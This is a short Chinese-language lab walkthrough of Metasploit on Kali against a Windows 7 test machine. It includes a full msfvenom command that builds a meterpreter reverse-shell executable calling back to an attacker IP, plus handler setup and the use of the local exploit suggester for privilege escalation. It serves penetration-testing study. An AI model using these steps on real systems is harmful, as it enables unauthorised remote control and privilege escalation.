首先在kali中安装好Metasploit(版本比较老的需要),直接输入Metasploit我们可以看到它的使用规则,它也举了例子提供查看
1、使用模块生成木马文件msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.123 lport=12345 -f exe -o shell.exe,然后启动http服务,让靶机访问然后下载shell文件
2、在靶机中访问http://192.168.123.123:8000点击shell文件下载
3、接着回到kali,打开msfvenom的控制台,输入msfconsole,然后使用监听模块,输入use exploit/multi/handler进入到监听模块
4、show options查看选项,然后设置模块信息,运行
5、回到window7中,运行刚刚下载的shell文件,在kali中可以看到成功连接上了,然后在终端中输入whoami /groups可以查看当前用户权限,可以看到我们只是普通用户
6、接着输入exit退出终端然后输入background将监听挂载在后台,输入search suggester搜索推荐模块,然后进入该模块
7、连接到后台,让该模块来帮我们查找适合的漏洞(时间会有点久,稍微等一下)
8、可以查看到有多个模块可以使用,查看后面的描述来选择合适的,每个人的版本都可能不一样,因此漏洞也可能不一样,建议使用前几个模块来测试,不要问为什么(因为我后面都是试过了,都不行,或许你的可以动手试试吧)
9、 复制该路径,使用use 进入,设置session,然后执行
10、验证权限是否成功提升,这里的步骤和上面的一样就不多说了